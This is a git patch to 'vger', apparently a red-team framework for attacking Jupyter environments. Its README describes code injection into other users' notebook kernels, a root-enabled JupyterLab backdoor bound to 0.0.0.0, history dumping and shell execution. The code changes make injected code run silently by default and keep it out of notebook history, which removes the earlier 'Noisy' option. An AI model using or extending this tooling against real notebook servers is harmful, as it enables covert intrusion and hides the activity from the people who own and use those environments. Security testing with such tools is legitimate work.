From a0a2fcb0a2eea8c8bd70f281192433f84b1e2542 Mon Sep 17 00:00:00 2001 From: Joe Lucas Date: Sun, 21 Jan 2024 14:26:53 -0600 Subject: [PATCH] fix some history management --- README.md | 2 +- pyproject.toml | 2 +- vger/attack.py | 4 ++-- vger/exploit.py | 20 ++++---------------- 4 files changed, 8 insertions(+), 20 deletions(-) diff --git a/README.md b/README.md index f73c3b0..bd29a96 100644 --- a/README.md +++ b/README.md @@ -28,7 +28,7 @@ The top level menu is: These menus contain the following functionality: - **List modules**: Identify imported modules in target notebooks to determine what libraries are available for injected code. -- **Inject**: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local `.py` file. Either input is processed as a string and executed in runtime of the notebook. Output will be transparent to other notebook users by specifying `Noisy` or `Stealthy` when prompted. This selection will also dictate how much information is returned to the user about their execution. +- **Inject**: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local `.py` file. Either input is processed as a string and executed in runtime of the notebook. - **Backdoor**: Launch a new JupyterLab instance open to `0.0.0.0`, with `allow-root` on a user-specified `port` with a user-specified `password`. - **Check History**: See ipython commands recently run in the target notebook. - **Run shell command**: Spawn a terminal, run the command, return the output, and delete the terminal. diff --git a/pyproject.toml b/pyproject.toml index 3932940..cd7da61 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,6 +1,6 @@ [tool.poetry] name = "vger" -version = "0.1.4" +version = "0.1.5" description = "An execution framework for Jupyter environments." authors = ["Joseph Lucas "] license = "GPL-3.0-only" diff --git a/vger/attack.py b/vger/attack.py index a4e562f..17ce781 100644 --- a/vger/attack.py +++ b/vger/attack.py @@ -12,13 +12,13 @@ async def attack_session( - connection, session, code, silent=False, print_out=True, get_hist=False + connection, session, code, silent=True, print_out=True, get_hist=False ): jpy_sess = connection.jpy_sessions[session] code_msg_id = str(uuid.uuid1()) code_msg = { "channel": "shell", - "content": {"silent": silent, "code": code}, + "content": {"silent": silent, "store_history": False, "code": code}, "header": {"msg_id": code_msg_id, "msg_type": "execute_request"}, "metadata": {}, "parent_header": {}, diff --git a/vger/exploit.py b/vger/exploit.py index d7e2239..13f1af8 100644 --- a/vger/exploit.py +++ b/vger/exploit.py @@ -15,12 +15,12 @@ def inject(self): attack_menu = [ inquirer.List( name="payload", - message="Would you like to type your payload or reference an existing .py file?", - choices=["Type", ".py"], + message="Would you like to use an editor for your payload or reference an existing .py file?", + choices=["editor", ".py"], ) ] answer = inquirer.prompt(attack_menu) - if answer["payload"] == "Type": + if answer["payload"] == "editor": payload_str = inquirer.editor("What code would you like to inject?") else: payload = [ @@ -35,21 +35,9 @@ def inject(self): path = answer["path"].split("? ")[-1] with open(path, "r") as f: payload_str = f.read() - silent = [ - inquirer.List( - "choice", - message="Would you like show up in the history and modify the execution counter?", - choices=["Yes (Noisy)", "No (Stealthy)"], - ) - ] - answer = inquirer.prompt(silent) - if "Yes" in answer["choice"]: - silent = False - else: - silent = True loop = asyncio.get_event_loop() loop.run_until_complete( - attack_session(self.connection, self.target, payload_str, silent=silent) + attack_session(self.connection, self.target, payload_str) ) def dump_history(self):